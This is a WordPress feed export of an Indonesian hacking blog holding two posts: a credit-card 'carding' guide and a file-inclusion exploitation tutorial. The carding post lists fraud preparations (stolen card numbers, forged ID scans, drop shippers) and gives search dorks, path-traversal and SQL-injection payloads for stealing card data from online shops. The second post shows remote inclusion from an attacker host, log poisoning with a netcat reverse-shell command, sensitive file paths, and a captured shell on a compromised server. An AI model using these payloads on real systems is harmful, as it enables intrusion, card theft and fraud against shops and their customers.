<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/br0m0c0ra.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/br0m0c0ra.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/br0m0c0ra.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/br0m0c0ra.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/br0m0c0ra.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/br0m0c0ra.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/br0m0c0ra.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/br0m0c0ra.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/br0m0c0ra.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/br0m0c0ra.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/br0m0c0ra.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/br0m0c0ra.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/br0m0c0ra.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/br0m0c0ra.wordpress.com/12/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=br0m0c0ra.wordpress.com&amp;blog=9814395&amp;post=12&amp;subd=br0m0c0ra&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://br0m0c0ra.wordpress.com/2009/10/11/meta-search-engine-script-url/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d4a2b2e16febdad3d0b6b636fe2f2cb2?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">br0m0c0ra</media:title>
		</media:content>
	</item>
		<item>
		<title>Carding, Old Bugs But Works</title>
		<link>http://br0m0c0ra.wordpress.com/2009/10/06/carding-old-bugs-but-works/</link>
		<comments>http://br0m0c0ra.wordpress.com/2009/10/06/carding-old-bugs-but-works/#comments</comments>
		<pubDate>Tue, 06 Oct 2009 19:24:38 +0000</pubDate>
		<dc:creator>br0m0c0ra</dc:creator>
				<category><![CDATA[c4RdiN9]]></category>
		<category><![CDATA[./admin/files/order.log]]></category>
		<category><![CDATA[carding]]></category>
		<category><![CDATA[vcc credit card]]></category>

		<guid isPermaLink="false">http://br0m0c0ra.wordpress.com/?p=7</guid>
		<description><![CDATA[Carding…carding…carding, sebener’a males banget buat bikin tutorial ini, tapi yach terpaksa gw bikin tutorial ini karena gw udah capek di tanyain gimana sey cara carding? bro ajarin carding dunkz ?! om cara dapetin cc valid tuch gimana ?? dan bahkan ada yg tanpa malu² langsung ngomong, nyet !! pesen laptop or aircraft dunk satu, kirim [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=br0m0c0ra.wordpress.com&amp;blog=9814395&amp;post=7&amp;subd=br0m0c0ra&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Carding…carding…carding, sebener’a males banget buat bikin tutorial ini, tapi yach terpaksa gw bikin tutorial ini karena gw udah capek di tanyain gimana sey cara carding? bro ajarin carding dunkz ?! om cara dapetin cc valid tuch gimana ?? dan bahkan ada yg tanpa malu² langsung ngomong, nyet !! pesen laptop or aircraft dunk satu, kirim ke alamat gw yak, gileee benerrrr klo ngomong seenak jidat !! dan yg bikin gw paling bete klo mereka nanyaaAaaaAaaa molo yg semua jawaban’a tuch udah jelas² ada di google, padahal google lebih mengerti daripada gw</p>
<p><span id="more-7"></span></p>
<p><span id="more-40"> </span></p>
<p>Ngomong sey emang gampang, tapi praktek’a itu butuh kesabaran, harus pinter ngomong, fasih berbahasa inggris dan untuk lo tau bahwa carding itu untung²an, jadi ngapain juga klo gw dapet barang bagus gw kasih ke lo, mendingan buat gw aja</p>
<p>pasti lo² semua yg sering nanya ke gw mo tau kan apa aja yg gw persiapkan sebelom melakukan carding, well… tanpa ada sedikitpun yg gw tutup²in terkecuali bagian bawah dari tubuh gw, sekarang gw kasih tau:</p>
<p>1. Credit Card number + cvv + expired (harus valid)<br />
2. Proxy USA klo bisa<br />
3. Virtual Phone Number (skype)<br />
4. Virtual Address (klo di butuhkan)<br />
5. Email khusus carding (yahoomail,gmail,hotmail,etc)<br />
6. Seller<br />
7. Dropper (biar barang lo cepet nyampe’a)<br />
8. Roko Mild satu bungkus<br />
9. Snack Potato Rasa Barbeque 5 Bungkus<br />
10. Music Player (winamp,jet audio,amarok)</p>
<p>okay !! gw yakin lo pada nanya gimana cara dapetin proxy? nah di sini balik lagi dey lo sama yg nama’a webshell yg lo dapetin dari web yg mempunyai bug Remote File Inclusion, di sana lo bisa bikin proxy sendiri, tapi klo lo emang orang’a “MALES” mendingan lo balik lagi ke paman google, lo bisa cari situs² penyedia proxy gratis, tapi yaa gitu dey, ga awet, paling lama juga 1 jam udah mati.</p>
<p>Kedua tentang virtual phone number, tau skype kan ? itu loch yg buat voip (voice over internet protocol) nah lo bisa beli nomer telephone virtual dari USA melewati skype, trus fungsi’a buat apa ?? gw males jelasin’a mendingan lo join aja di chan #yogyacarderlink dan tanya² sama anak² yg ada di sana okay !!</p>
<p>Ketiga tentang virtual address, di sini lo beli alamat virtual di USA dan ada lembaga di sana yg ngurus barang² lo buat di kirim ke alamat asli lo, cuma proses pembelian’a agak susah, lo harus nunjukin credit card, license drive, ID card, visa, paspor, bingung gimana cara’a ? buat apa ada photoshop klo ga di gunain, hahahah, lagian dia kan cuma minta gambar hasil scan, jadi cari aja gambar²a di google trus edit dey di photoshop.</p>
<p>Keempat Email khusus, satu hal penting, jangan pernah ngirim orderan ke email lo yg biasa lo pake buat ngirim² pesan penting, jangan pernah lo campur aduk tu email, klo bisa lo bikin lagi email baru yg khusus buat carding, dan biasain pake logika lo, klo mo carding, nama email’a yg berhubungan dengan nama² orang USA sana, minimal lo dapet 1 point kecil penting lah untuk nama email ini.</p>
<p>Kelima lo harus punya seller or penjual yg kira² bisa shipping worldwide, silakan cari sendiri shop online di google yg bisa shipping worldwide dengan imajinasi kata² lo sendiri.</p>
<p>Keenam about Dropper, nah ini di butuhin klo emang kita dapet shop online yg ga nerima shipping worldwide, inti’a lo harus punya kenalan or koneksi di USA atau di Canada bahkan mungkin England yg bisa di ajak kerjasama, jadi begitu barang di kirim ke dropper, dia langsung ngirim ke alamat kita, jadi seandai’a lo beli laptop, jangan beli satu, tapi minimal dua, biar satu buat kita, satu buat dia, itu nama’a kerjasama kan ?? dan di situlah kerjaan dropper, mereka cuma ngedrop barang kita doank dan mereka dapet untung juga dari kita</p>
<p>and The Last, how to find valid credit card, here’s old bug but works</p>
<p>1. contoh bugs pada bentuk toko sistem shopadmin :<br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
Ketik google.com :–&gt; allinurl:/shopadmin.asp<br />
Contoh target : www.xxxxxx.com/shopadmin.asp<br />
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :<br />
user : ‘or’1<br />
pass : ‘or’1</p>
<p>2. contoh bugs pada bentuk toko sistem : Index CGI<br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google.com : Ketik –&gt; allinurl:/store/index.cgi/page=<br />
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm<br />
Hapus short_blue.htm dan ganti dengan –&gt; ../admin/files/order.log<br />
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/<br />
order.log</p>
<p>3. contoh bugs pada bentuk toko sistem : metacart<br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google.com allinurl:/metacart/<br />
Contoh target : www.xxxxxx.com/metacart/about.asp<br />
Hapus moreinfo.asp dan ganti dengan –&gt; /database/metacart.mdb<br />
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb</p>
<p>4. contoh bugs pada bentuk toko sistem <img src="http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" /> CShop<br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google.com : Ketik –&gt; allinurl:/DCShop/<br />
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx<br />
Hapus /DCShop/xxxx dan ganti dengan –&gt; /DCShop/orders/orders.txt<br />
atau /DCShop/Orders/orders.txt<br />
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt</p>
<p>5. contoh bugs pada bentuk toko sistem : PDshopro<br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google.com : Ketik –&gt; allinurl:/shop/category.asp/catid=<br />
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx<br />
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –&gt; /admin/<br />
dbsetup.asp<br />
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp<br />
Dari keterangan diatas , kita dapati file databasenya dgn nama<br />
sdatapdshoppro.mdb<br />
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi<br />
www.xxxxxx.com/data/pdshoppro.mdb<br />
Buka file tsb pakai Microsoft Acces (karena untuk membaca database<br />
access.mdb sebaiknya pake ms access aja)</p>
<p>6. contoh bugs pada bentuk toko sistem : commerceSQL<br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google : Ketik –&gt; allinurl:/commercesql/<br />
Contoh : www.xxxxx.com/commercesql/xxxxx<br />
Hapus commercesql/xxxxx dan ganti dengan –&gt;<br />
cgi-bin/commercesql/index.cgi?page=<br />
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=<br />
Untuk melihat admin config –&gt;<br />
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl<br />
Untuk melihat admin manager –&gt;<br />
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi<br />
Untuk melihat file log/CCnya –&gt;<br />
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order…</p>
<p>7. contoh bugs pada bentuk toko sistem : EShop<br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google: Ketik –&gt; allinurl:/eshop/<br />
Contoh : www.xxxxx.com/xxxxx/eshop<br />
Hapus /eshop dan ganti dengan –&gt; /cg-bin/eshop/database/order.mdb<br />
Hasilnya : www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb<br />
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces<br />
(karena untuk membaca database access.mdb sebaiknya pake ms access<br />
aja)</p>
<p>8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a<br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google.com: Ketik –&gt; allinurl:/cart32.exe/<br />
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound<br />
Ganti NoItemFound dengan –&gt; error<br />
Bila kita mendapati page error dg keterangan instalasi dibawahnya,<br />
berarti kita sukses!<br />
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman<br />
kebawah, dan cari bagian Page Setup and Directory<br />
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32<br />
berarti di site tsb. terdapat file berisi data cc<br />
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program<br />
text editor lainnya.<br />
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/<br />
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah<br />
dimodifikasi tadi, dengan format<br />
http://www.xxxxx.com/cart32/<br />
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32</p>
<p>9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0<br />
teknik/jalan ke dua<br />
google.com Ketik –&gt; allinurl:/vpasp/shopdisplayproducts.asp<br />
Buka url target dan tambahkan string berikut di akhir bagian<br />
shopdisplayproducts.asp<br />
Contoh :<br />
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%…,<br />
fldpassword%20from%20tbluser%20where%20fldusername=<br />
‘admin’%20and%20fldpassword%20like%20′a%25′–<br />
Gantilah nilai dari string url terakhir dg:<br />
%20′a%25′–<br />
%20′b%25′–<br />
%20′c%25′–<br />
Kalau berhasil, kita akan mendapatkan informasi username dan password<br />
admin<br />
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp<br />
silahkan Cari sendiri data CCnya</p>
<p>10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0<br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google.com : Ketik –&gt; allinurl:/vpasp/shopsearch.asp</p>
<p>Buka url target dan utk membuat admin baru, postingkan data berikut<br />
satu per satu pada bagian search engine :<br />
Keyword=&amp;category=5); insert into tbluser (fldusername) values<br />
(”)–&amp;SubCategory=&amp;hide=&amp;action.x=46&amp;action.y=6<br />
Keyword=&amp;category=5); update tbluser set fldpassword=” where<br />
fldusername=”–&amp;SubCategory=All&amp;action.x=33&amp;action.y=6<br />
Keyword=&amp;category=3); update tbluser set fldaccess=’1′ where<br />
fldusername=”–&amp;SubCategory=All&amp;action.x=33&amp;action.y=6<br />
Jangan lupa untuk mengganti dan nya terserah kamu.<br />
Untuk mengganti password admin, masukkan keyword berikut :<br />
Keyword=&amp;category=5); update tbluser set fldpassword=” where<br />
fldusername=’admin’–&amp;SubCategory=All&amp;action.x=33&amp;action.y=6</p>
<p>Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp</p>
<p>11. contoh bugs pada bentuk toko sistem : Lobby.asp<br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google.com Ketik –&gt; allinurl: Lobby.asp<br />
Contoh : www.xxxxx.com/mall/lobby.asp<br />
Hapus tulisan mall/lobby.asp dan ganti dengan –&gt; fpdb/shop.mdb<br />
Hasilnya : www.xxxxx.com/fpdb/shop.mdb</p>
<p>12. contoh bugs pada bentuk toko sistem : Shopper.cgi<br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google : Ketik –&gt; allinurl: /cgi-local/shopper.cgi<br />
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&amp;key=<br />
Tambah dengan –&gt; …&amp;template=order.log<br />
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&amp;key=…&amp;template…</p>
<p>13. contoh bugs pada bentuk toko sistem <img src="http://s.wordpress.com/wp-includes/images/smilies/icon_razz.gif" alt=":P" /> roddetail.asp<br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
Ketik –&gt; allinurl:proddetail.asp?prod=<br />
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle<br />
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –&gt; fpdb/<br />
vsproducts.mdb<br />
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb</p>
<p>14. contoh bugs pada bentuk toko sistem <img src="http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" /> igishop<br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google Ketik –&gt; inurl:”/cart.php?m=”<br />
Contoh : http://xxxxxxx.com/store/cart.php?m=view.<br />
Hapus tulisan cart.php?m=view dan ganti dengan –&gt;admin<br />
Hasilnya http://xxxxxx.com/store/admin<br />
Trus masukin username sama pass nya pake statment SQL injection</p>
<p>Usename : ‘or”=”<br />
Password : ‘or”=”</p>
<p>well, menurut gw ini udah cukup menjelaskan bagaimana langkah² untuk melakukan carding, dan klo masih ada yg mo di tanyain lagi, silakan join aja di #yogycarderlink@Dal.net, cuz i dont wanna you ask to me on private messege again about carding !!</p>
<p><span style="font-size:85%;">#yogyacarderlink@Dal.net cRew</span></p>
<p><span style="font-size:85%;">Resource : </span>http://0wnage.wordpress.com/2008/07/15/carding-old-bugs-but-works/#more-40</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/br0m0c0ra.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/br0m0c0ra.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/br0m0c0ra.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/br0m0c0ra.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/br0m0c0ra.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/br0m0c0ra.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/br0m0c0ra.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/br0m0c0ra.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/br0m0c0ra.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/br0m0c0ra.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/br0m0c0ra.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/br0m0c0ra.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/br0m0c0ra.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/br0m0c0ra.wordpress.com/7/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=br0m0c0ra.wordpress.com&amp;blog=9814395&amp;post=7&amp;subd=br0m0c0ra&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://br0m0c0ra.wordpress.com/2009/10/06/carding-old-bugs-but-works/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d4a2b2e16febdad3d0b6b636fe2f2cb2?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">br0m0c0ra</media:title>
		</media:content>

		<media:content url="http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif" medium="image">
			<media:title type="html">:D</media:title>
		</media:content>

		<media:content url="http://s.wordpress.com/wp-includes/images/smilies/icon_razz.gif" medium="image">
			<media:title type="html">:P</media:title>
		</media:content>

		<media:content url="http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif" medium="image">
			<media:title type="html">:D</media:title>
		</media:content>
	</item>
		<item>
		<title>Remote dan Local File Inclusion Vulnerability</title>
		<link>http://br0m0c0ra.wordpress.com/2009/10/06/remote-dan-local-file-inclusion-vulnerability/</link>
		<comments>http://br0m0c0ra.wordpress.com/2009/10/06/remote-dan-local-file-inclusion-vulnerability/#comments</comments>
		<pubDate>Tue, 06 Oct 2009 18:58:59 +0000</pubDate>
		<dc:creator>br0m0c0ra</dc:creator>
				<category><![CDATA[eXpL01t]]></category>

		<guid isPermaLink="false">http://br0m0c0ra.wordpress.com/?p=3</guid>
		<description><![CDATA[Salah satu bugs lawas di Aplikasi berbasis web yaitu “File Inclusion”. File Inclusion adalah cara menyisipkan potongan malicious code attacker ke dalam sebuah situs yang vulnerable, fungsi dalam php yang memperbolehkan penyisipan file php adalah include,include_once,require,require_once. Penyisipan sebuah malicious code bisa dilakukan secara remote atau mesin berbeda dengan server, bisa menggunakan protokol http:// https:// ftp:// [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=br0m0c0ra.wordpress.com&amp;blog=9814395&amp;post=3&amp;subd=br0m0c0ra&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Salah satu <a href="http://logsmylife.wordpress.com/2009/09/04/tutorial-teknik-exploitasi-web-application-dengan-blind-sql-injection/">bugs</a> lawas di Aplikasi berbasis web yaitu <a href="http://logsmylife.wordpress.com/2009/06/23/local-file-inclusion-vulnerability/">“File Inclusion”</a>. File Inclusion adalah cara menyisipkan potongan malicious code attacker ke dalam sebuah situs yang vulnerable, fungsi dalam php yang memperbolehkan penyisipan file php adalah include,include_once,require,require_once. Penyisipan sebuah malicious code bisa dilakukan secara remote atau mesin berbeda dengan server, bisa menggunakan protokol http:// https:// ftp:// smb:// atau biasa disebut <span id="more-3"></span>“<a href="http://logsmylife.wordpress.com/2009/07/10/remote-code-execution-pada-phpmyadmin/">Remote</a> File Inclusion”, jika sebuah penyisipan malicious code gagal mungkin setting allow_url_include berada dalam kondisi “Off” pada php.ini. Attacker yang sadar bahwa aksi penyusupan malicious code gagal selanjutnya ia mencoba teknik “Local File Inclusion” dimana penyisipan halaman berada dalam server yang sama.</p>
<p>Mungkin ada yang bertanya seberapa besarkah dampak yang dihasilkan dari File Inclusion?. Dampak dari File Inclusion bisa dikatakan “High Risk” karena File Inclusion bisa digunakan untuk mendapatkan akses shell, dan pada akhirnya dilakukan sebuah <a href="http://logsmylife.wordpress.com/2009/05/25/local-root-exploiting/">Local Exploitation</a> untuk mendapatkan hak akses penuh terhadap sistem. Sebuah contoh skrip php yang rentan terhadap file inclusion secara sederhana seperti di bawah ini :</p>
<pre>&lt;?php
	$page = $_GET['page'];
	include($page);
?&gt;
</pre>
<p>Jika kode diatas kita eksekusi akan menghasilkan eror seperti ini :<br />
<code><br />
Notice: Undefined index: page in /var/www/htdocs/page.php on line 2</code></p>
<p>Warning: include() [function.include]: Failed opening ” for inclusion (include_path=’.:/usr/lib/php’) in /var/www/htdocs/page.php on line 3</p>
<p>Variabel page tidak terdeklarasi, jadi variabel page bisa kita manipulasi valuenya ke skrip si attacker. Contoh :</p>
<p><code>http://localhost/page.php?page=http://attacker/evil.txt%00</code></p>
<p><a href="http://logsmylife.files.wordpress.com/2009/09/lfi.jpg"><img title="local file inclusion 1" src="http://logsmylife.files.wordpress.com/2009/09/lfi.jpg?w=300&#038;h=225&#038;h=225" alt="local file inclusion 1" width="300" height="225" /></a></p>
<p>Dimana evil.txt diatas berisi :</p>
<pre>&lt;?
echo "".passthru('uname -rv')."";
echo "&lt;p&gt;";
echo "".passthru('pwd')."";
echo "&lt;p&gt;";
echo "".passthru('id')."";
echo "&lt;p&gt;";
echo "".passthru('ls')."";
echo "&lt;p&gt;";
?&gt;
</pre>
<p>bisa kita gunakan melihatkan kepada kita tentang informasi server yang menjadi target dan bisa kita tingkatkan ke yang lebih berbahaya, seperti mendapatkan shell. Jika aksi “Remote File Inclusion” seperti di atas hanya menghasilkan error seperti ini :</p>
<p><code>Warning: include() [function.include]: URL file-access is disabled in the server configuration in /var/www/htdocs/page.php on line 3</code></p>
<p>Warning: include(http://uname.site88.net/sh2.txt) [function.include]: failed to open stream: no suitable wrapper could be found in /var/www/htdocs/page.php on line 3</p>
<p>Warning: include() [function.include]: Failed opening ‘http://uname.site88.net/sh2.txt’ for inclusion (include_path=’.:/usr/lib/php’) in /var/www/htdocs/page.php on line 3</p>
<p>Warning diatas muncul dikarenakan seting “allow_url_include” berada dalam kondisi “Off” pada php.ini. Pada kondisi ini kita tidak bisa melakukan penyisipan kode secara terpisah dari server target (remote), lalu coba sisipkan kode secara local.</p>
<p><code>http://target/page.php?page=../../../../etc/passwd</code></p>
<p>Jika url di atas dibuka akan seperti ni :<br />
<a href="http://logsmylife.files.wordpress.com/2009/09/lfi2.jpg"><img title="local file inclusion 2" src="http://logsmylife.files.wordpress.com/2009/09/lfi2.jpg?w=300&#038;h=225&#038;h=225" alt="local file inclusion 2" width="300" height="225" /></a></p>
<p>Pada akhir url biasa ditambahkan null byte atau %00 atau ?. Maksud dari ../ adalah naik satu direktori, contoh diatas kita di atas turun 4 direktori. Ingat pada saat anda turun satu direktori di shell dengan sintaks :</p>
<p><code>root@slacker:~/webresource/web archive# pwd<br />
/root/webresource/web archive    <strong>Lokasi direktori sekarang</strong><br />
root@slacker:~/webresource/web archive# cd ../cms/		<strong>Turun satu direktori dan masuk ke</strong><br />
root@slacker:~/webresource/cms# pwd				   <strong>direktori cms</strong><br />
/root/webresource/cms</code></p>
<p>Dan beberapa file sensitif lain di sebuah webserver :</p>
<p>/etc/passwd<br />
/etc/shadow<br />
/etc/group<br />
/etc/security/group<br />
/etc/security/passwd<br />
/etc/security/user<br />
/etc/security/environ<br />
/etc/security/limits<br />
/usr/lib/security/mkuser.default</p>
<p>Dari bugs tersebut bisa kita manfaatkan untuk mengakses shell target (Remote Connect-Back Shell), dengan memanfaatkan request malicious code yang mengakibatkan 400 Bad Request dan tercatat di error_log webserver dan melakukan Connect Back yang terlebih dahulu kita buat statenya listen mode, untuk inbound connects. Lakukan telnet ke webserver target lewat port 80, dan buat request kode berikut (192.168.16.09 adalah ip anda):</p>
<pre>GET/&lt;? echo "".passthru('nc -e /bin/bash 292.138.16.109 42001').""; ?&gt;
</pre>
<p><a href="http://logsmylife.files.wordpress.com/2009/09/lfi5.jpg"><img title="LFI5" src="http://logsmylife.files.wordpress.com/2009/09/lfi5.jpg?w=300&#038;h=226&#038;h=226" alt="LFI5" width="300" height="226" /></a></p>
<p>Aksi anda dia atas akan dicatat di error_log webserver, dan tugas anda sekarang adalah mencari lokasi error log-nya, dibawah ini kemungkinan lokasi dari error_log berada, dan sesuaikan tingkatan direktori-nya juga :</p>
<p>../apache/logs/error.log<br />
../apache/logs/access.log<br />
../../apache/logs/error.log<br />
../../apache/logs/access.log<br />
../../../apache/logs/error.log<br />
../../../apache/logs/access.log<br />
../../../../../../../etc/httpd/logs/acces_log<br />
../../../../../../../etc/httpd/logs/acces.log<br />
../../../../../../../etc/httpd/logs/error_log<br />
../../../../../../../etc/httpd/logs/error.log<br />
../../../../../../../var/www/logs/access_log<br />
../../../../../../../var/www/logs/access.log<br />
../../../../../../../usr/local/apache/logs/access_ log<br />
../../../../../../../usr/local/apache/logs/access. log<br />
../../../../../../../var/log/apache/access_log<br />
../../../../../../../var/log/apache2/access_log<br />
../../../../../../../var/log/apache/access.log<br />
../../../../../../../var/log/apache2/access.log<br />
../../../../../../../var/log/access_log<br />
../../../../../../../var/log/access.log<br />
../../../../../../../var/www/logs/error_log<br />
../../../../../../../var/www/logs/error.log<br />
../../../../../../../usr/local/apache/logs/error_l og<br />
../../../../../../../usr/local/apache/logs/error.l og<br />
../../../../../../../var/log/apache/error_log<br />
../../../../../../../var/log/apache2/error_log<br />
../../../../../../../var/log/apache/error.log<br />
../../../../../../../var/log/apache2/error.log<br />
../../../../../../../var/log/error_log<br />
../../../../../../../var/log/error.log<br />
../../../../../../../var/log/httpd/error_log<br />
../../../../../../../var/log/httpd/error.log</p>
<p>kemungkinan lain file log diikuti juga dengan nama domainnya, seperti :</p>
<p>../../../../../../../var/log/httpd/namadomain.org-error_log<br />
../../../../../../../var/log/httpd/namadomain.org-access_log</p>
<p>dengan menggunakan nc (netcat) kita buat koneksi inbound yang menunggu koneksi dari luar dengan perintah :</p>
<p><code>root@slacker:~# nc -l -v -p 42001</code></p>
<p>sekarang anda buka file log tersebut di url, seperti ini jadinya :</p>
<p><a href="http://logsmylife.files.wordpress.com/2009/09/lfi4.jpg"><img title="local file inclusion" src="http://logsmylife.files.wordpress.com/2009/09/lfi4.jpg?w=300&#038;h=225&#038;h=225" alt="local file inclusion" width="300" height="225" /></a></p>
<p>Jika berhasil anda telah melakukan Remote Connect-Back Shell, coba lihat konsole anda yang menjalankan nc tadi, kita akan mendapatkan shell dari target dan kita bisa menjalankan berbagai perintah linux. Selanjutnya terserah anda, ingin melakukan deface, privilege excalation, atau pasang backdoor sok atuh,,,. Seperti yang saya lakukan di sebuah webserver, dan saya ilustrasikan di baris di bawah.</p>
<p><code>root@slacker:~# <strong>nc -v -n -l -p 42001</strong><br />
listening on [any] 42001 ...<br />
connect to [292.138.16.109] from (UNKNOWN) [210.50.2.238] 45646<br />
ls -la<br />
total 3816<br />
drwxrwxrwx   4 45234    uname        4096 Sep 21 03:04 ./<br />
drwxrwxrwx  11 45234    uname        4096 Sep 21 02:19 ../<br />
drwxrwxrwx   2 45234    uname        4096 Jul 22 14:12 OverLib/<br />
-rw-rw-rw-   1 45234    uname        2236 Jun  3 07:26 _db_funcs.php<br />
-rw-rw-rw-   1 45234    uname        1367 Sep 21 02:23 _error_funcs.php<br />
-rw-rw-rw-   1 45234    uname        1368 Sep 21 02:23 _error_funcs.php~<br />
-rw-rw-rw-   1 45234    uname        1483 Jul 22 03:38 _header.php<br />
-rw-rw-rw-   1 45234    uname        1594 Jul  8 05:04 _html_head.php<br />
-rw-rw-rw-   1 45234    uname        2479 Jul  8 05:04 _image_scaler.php<br />
-rw-rw-rw-   1 45234    uname        4268 Jul 14 04:15 _integrity_funcs.php<br />
-rw-rw-rw-   1 45234    uname        2077 Apr 11 05:49 _login.php<br />
-rw-rw-rw-   1 45234    uname         326 Apr  2 00:01 _logout.php<br />
-rw-rw-rw-   1 45234    uname        5529 Jul  5 07:15 _request.js<br />
-rw-rw-rw-   1 45234    uname        8835 Jun  7 21:46 _template_component_admin.php<br />
-rw-rw-rw-   1 45234    uname        1392 Jun  3 07:26 _template_component_footer.php<br />
-rw-rw-rw-   1 45234    uname       11587 Jul  7 06:04 _template_component_gallery.php<br />
-rw-rw-rw-   1 45234    uname        1383 Jul 17 05:17 _template_component_generic.php<br />
